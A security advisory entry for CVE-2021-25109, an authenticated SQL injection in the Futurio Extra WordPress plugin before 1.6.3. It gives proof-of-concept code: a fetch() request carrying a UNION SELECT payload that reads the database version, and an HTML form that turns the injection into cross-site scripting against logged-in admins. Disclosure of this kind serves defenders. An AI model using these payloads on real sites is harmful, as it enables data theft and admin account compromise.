Lucene search
Jan w OlejuWPEX-ID:36261AF9-3B34-4563-AF3C-C9E54AE2D581HistoryJan 04, 2022 - 12:00 a.m.
Futurio Extra < 1.6.3 - Authenticated SQL Injection
2022-01-0400:00:00
Jan w Oleju
101
0.001 Low
EPSS
Percentile
24.8%
The plugin is affected by a SQL Injection vulnerability that could be used by high privilege users to extract data from the database as well as used to perform Cross-Site Scripting (XSS) against logged in admins by making send open a malicious link
Using SQLi to extract database variables:
fetch("http://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": '" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g', "query_args": "YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==", "query_type": "post"}),
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):
<form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="dilaz_mb_query_select">
<input type="text" name="q" value='" union select 0,1,2,3,4,0x3c696d6720737263206f6e6572726f723d616c6572742831293e,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g'>
<input type="text" name="query_args" value="YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==">
<input type="text" name="query_type" value="post">
<input type="submit">
</form>
Related
wpvulndb
wpvulndb
Futurio Extra < 1.6.3 - Authenticated SQL Injection
2022-01-04 00:00:00
cvelist
cvelist
CVE-2021-25109 Futurio Extra < 1.6.3 - Authenticated SQL Injection
2022-02-14 09:20:52
patchstack
patchstack
nvd
nvd
CVE-2021-25109
2022-02-14 12:15:15
cnvd
cnvd
WordPress Futurio Extra plugin SQL injection vulnerability
2022-02-16 00:00:00
cve
cve
CVE-2021-25109
2022-02-14 12:15:15
prion
prion
Cross site scripting
2022-02-14 12:15:00